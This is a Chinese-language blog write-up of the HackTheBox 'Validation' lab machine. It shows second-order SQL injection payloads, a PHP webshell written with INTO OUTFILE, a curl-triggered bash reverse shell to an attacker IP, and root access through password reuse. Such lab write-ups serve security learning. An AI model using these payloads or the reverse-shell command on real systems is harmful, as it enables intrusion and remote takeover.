Linux/Validation

已于 2024-03-20 21:32:18 修改
阅读量367 收藏 5
点赞数 5
分类专栏: HackTheBox 文章标签: 网络安全
于 2024-03-07 15:21:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45557138/article/details/136534976
版权

Enumeration

nmap

第一次扫描发现系统对外开放了22,80,4566和8080端口,端口详细信息如下

系统对外开放了4个端口,从nmap的结果来看,8080无法访问,手动尝试后4566也无法访问,只能从80端口开始

TCP/80

访问80端口,得到如下界面,输入用户名选择国家后可以注册

填入用户名vegetable,国家选择Brazil,点击Join Now后,在burpsuite中可以看到请求包与服务器响应,注意到country也是可以修改的,服务器在收到请求后,进行了重定向,并且设置了一个名为user的cookie

页面被重定向到account.php,但是只是输出了几句话

重新创建了一个用户,另一个地方的vegetable,但是发现cookie是相同的,尝试使用在线网站解密该cookie值,发现cookie就是用户名的md5

考虑到页面让选择国家,但是burpsuite抓到的请求可以修改,在brazil参数后添加一个单引号,发送后还是会进行302跳转,但是重定向到account.php页面后,页面报错

设置Brazil' or 1=1--+,页面回显正常,设置1=2,页面回显异常

这是一个二阶sql注入

Foothold

Second Order SQL Injection

我将注册包发送至repeater,在Brazil后添加payload,发送后,会得到响应。将响应包中的cookie值复制放到account.php包,然后发送

设置order by 1,回显正常,设置order by 2,回显报错

可以判断列数为1,可以设置Brazil' union select 1--+,可以执行,并且存在回显点

设置Brazil' union select database();--+,可以执行,显示了一个数据库名

查看registration数据库中的表

Brazil' union select table_name from information_schema.tables where table_schema = 'registration'--+

可以看到有一个registration表

查看registration表中的columns

Brazil' union select column_name from information_schema.columns where table_name = 'registration'

可以看到有username,userhash,country,regtime

查看username发现只有一个vegetable

查看权限

Brazil' union select privilege_type FROM information_schema.user_privileges--+

可以看到有file权限

尝试能否写入webshell,但是报错了

Brazil' union select "hello world!" into+outfile '/var/www/html/vegetable.txt'--+

可是去请求vegetable.txt时,却能够成功访问

那么可以直接写入一个webshell

Brazil' union select "<?php SYSTEM($_REQUEST['cmd']); ?>" into outfile '/var/www/html/vegetable.php'

上传后尝试访问,发现上传成功并且能够执行命令

然后可以执行一个反向shell

curl 10.10.11.116/vegetable.php --data-urlencode 'cmd=bash -c "bash -i >&/dev/tcp/10.10.14.3/4444 0>&1"'

在监听端能得到shell,可以找到user.txt

Privilege Escalation

在web目录下,config.php中有认证信息

考虑密码复用,使用该密码登录root,成功!

ve9etable
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解决ClassNotFoundException: javax.validation.spi.ValidationProvider
粗人
06-08 1919
在我们这边非常正常的一个VM环境,但在中东一个Sales的机器上load vm就是不正常,VM中系统的环境如下: Spring 3.0 Spring DM(OSGi) 2.0.M1 Hibernate Validator 其它XX 系统启动时出现:   Caused by: java.lang.ClassNotFoundException: javax.validation.sp...
ORA-04045: errors during recompilation/revalidation of LBACSYS.LBAC_EVENTS
weixin_30542079的博客
06-25 614
使用orachk工具检查数据库实例的时候,发现报告里面有类似下面这样一些错误(最近有给Oracle 10g应用补丁PSU 10.2.0.5.180717,不清楚是这个产生的还是其他原因导致),使用脚本检查,发现有很多INVALID对象(具体参考[转载]—Health Check Reports Problem: Dependency$ p_timestamp mismatch for VALID ...
linux下载/解压ImageNet2012数据集
weixin_44368521的博客
02-26 512
亲测,有用,留档。
SSL证书申请之如何创建/.well-known/pki-validation/目录?
★【World Of Moshow 郑锴】★
11-10 1万+
问题背景 直接在windows下新建.well-known目录是会报错的,那么如何创建/.well-known/pki-validation/目录? 解决方案 莫慌,请用CMD,cd /d 对应的目录 然后输入mkdir .well-known创建。 ...
linux云服务器常用设置
weixin_45727997的博客
04-28 530
前面的话   由于在云服务器上配置自己的网站,将Linux里的常用设置记录如下 更改shell 默认地, ubuntu系统默认的shell是dash,但更常用的shell是bash 通过下面命令可以将dash更改为bash dpkg-reconfigure dash   然后选 执行ls -l /bin/sh命令,查看shell类型已经修改为bash ls -l /bin/sh 帐号权限 为了提高服务器安全性,需要设置一个高权限的账号来代替root执行常规操作 首先,新建一个用户 useradd test
Linux常用命令指南 - snap命令
热门推荐
yushuoqi的博客
11-07 2万+
Snap是Canonical公司为使用Linux内核和systemd init系统的操作系统开发的软件打包和部署系统。这些软件包称为snaps,以及使用它们的工具snapd,可以在一系列Linux 发行版上运行,并允许上游软件开发人员将其应用程序直接分发给用户。Snap 是在沙箱中运行的独立应用程序,可以通过中介访问主机系统。Snap 最初是针对云应用程序发布的,但后来被移植到也适用于物联网设备和桌面应用程序。Snap包是 Ubuntu 16.04 LTS 发布时引入的新应用格式包。
linux下载/解压ImageNet-1k数据集
qq_45588019的博客
07-06 1万+
linux下载/解压ImageNet-1k数据集
网站根目录的.well-known\pki-validation文件夹的作用:SSL证书认证文件
数字化转型高老师的专栏
01-09 6627
维护服务器的过程中发现一个这样的文件和文件夹 .well-known\pki-validation\fileauth.txt 记事本的内容只有一行字符串,经研究发现跟SSL的域名很类似,查阅相关资料,原来是SSL证书安装以后,会要求验证证书,所以需要在网站根目录建立这样的文件夹。 这个是Linux服务器控制台安装的SSL证书,自动安装写入该文件了。如果是Windows可以手工创建这个文件。但是windows是不能直接鼠标右键创建点号开头的文件夹,可以使用命令行创建。 cd web_folder
宝塔面板安装教程(linux
m0_60657960的博客
04-28 266
【代码】宝塔面板安装教程(linux
Linux基础
m0_53904877的博客
08-16 2149
Linux基础及网络配置课程笔记总结,课程是基于CentOS 7 ,以便于顺利通过考试及二次学习,后面有相关服务器配置方法
Linux Kernel validationtool
11-17
### Linux Kernel Validation Tool:关键技术与应用 #### 一、引言 在《Linux Kernel Validation Tools》这份资料中,作者Nicholas McGuire从兰州大学分布式与嵌入式系统实验室出发,详细介绍了针对Linux内核开发的...
.NET验证组件Fluent Validation使用指南
10-25
它还支持.NET Standard,这意味着开发者可以创建在多个.NET平台(如Windows、Linux、macOS)上运行的验证器。 通过上述内容的学习与实践,开发者可以掌握如何在.NET项目中使用Fluent Validation来实现业务对象的...
Linux环境下配置DNS服务
07-23
### Linux环境下配置DNS服务 #### 一、概述 在Linux环境下配置DNS服务是网络管理中的一个常见需求。本文档详细介绍了如何在VMware虚拟机上使用CentOS 7操作系统搭建DNS服务,包括DNS主服务器与辅助服务器的配置...
validation-webhook
03-18
Linux操作系统上安装cfssl实用程序。 curl -s -L -o / usr / bin / cfssl curl -s -L -o / usr / bin / cfssljson chmod + x / usr / bin / {cfssl,cfssljson} 初始化并生成必要的配置文件cfssl gencert -initca...
tomcat10安装包(含windows和linux版本).zip
04-18
1. **Tomcat10版本特性**:Tomcat10是最新版本,支持Java EE 9及以上的规范,包括JSR 390(Java Servlet 5.0),JSR 380(Bean Validation 2.0)等。它引入了新的API和改进,以提高性能和安全性。 2. **Windows安装...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8412
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于ssm和vue的 校园短期闲置资源置换平台源码 校园短期闲置资源置换平台代码(高分毕设项目源码)
08-23
1. 校园短期闲置资源置换平台代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是ssm,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
4S店客户管理小程序-毕业设计,基于微信小程序+SSM+MySql开发,源码+数据库+论文答辩+毕业论文+视频演示
08-23
4S店客户管理小程序-毕业设计,基于微信小程序+SSM+MySql开发,源码+数据库+论文答辩+毕业论文+视频演示 社会的发展和科学技术的进步,互联网技术越来越受欢迎。手机也逐渐受到广大人民群众的喜爱,也逐渐进入了每个用户的使用。手机具有便利性,速度快,效率高,成本低等优点。 因此,构建符合自己要求的操作系统是非常有意义的。 本文从管理员、用户的功能要求出发,4S店客户管理系统中的功能模块主要是实现管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理,用户客户端:首页、车展、新闻头条、我的。门店客户端:首页、车展、新闻头条、我的经过认真细致的研究,精心准备和规划,最后测试成功,系统可以正常使用。分析功能调整与4S店客户管理系统实现的实际需求相结合,讨论了微信开发者技术与后台结合java语言和MySQL数据库开发4S店客户管理系统的使用。 关键字:4S店客户管理系统小程序 微信开发者 Java技术 MySQL数据库 软件的功能: 1、开发实现4S店客户管理系统的整个系统程序; 2、管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理等。 3、用户客户端:首页、车展、新闻头条、我的 4、门店客户端:首页、车展、新闻头条、我的等相应操作; 5、基础数据管理:实现系统基本信息的添加、修改及删除等操作,并且根据需求进行交流信息的查看及回复相应操作。
Java项目:基于SSM框架+mysql个性化美食推荐系统含源码和毕业论文
最新发布
08-23
一、项目简介 本项目是一套基于SSM框架+mysql个性化美食推荐系统含源码和毕业论文 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,eclipse或者idea 确保可以运行! 该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值 二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.5及以上 后端:spring+springmvc+mybatis+maven+mysql 前端:jsp,css,js 三、系统功能 1、系统角色主要包括:管理员、用户 2、系统功能 主要功能包括: 用户登录 用户注册 首页 个人中心 修改密码 管理员信息 用户管理 美食信息管理 美食信息留言管理 美食信息收藏管理 美食订单管理 博主推荐管理 店址管理 口味管理 轮播图管理 前台主要功能包括: 用户登录 用户注册 首页 个性美食展示 热门美食推荐 美食详情 点我收藏 立即预订 个人中心 美食收藏 美食订单 余额充值 发表留言 博主推荐 跳转到后台等功能
nand validation
08-02
回答: 根据引用[1]中的描述,您在使用DaVinci-PSP-SDK-03.20.00.11进行U-Boot和Linux内核的开发时遇到了NAND验证的问题。您可以使用"ubiformat/dev/mtd2-frfs"命令来格式化NAND分区并刷写UBI根文件系统,然后使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值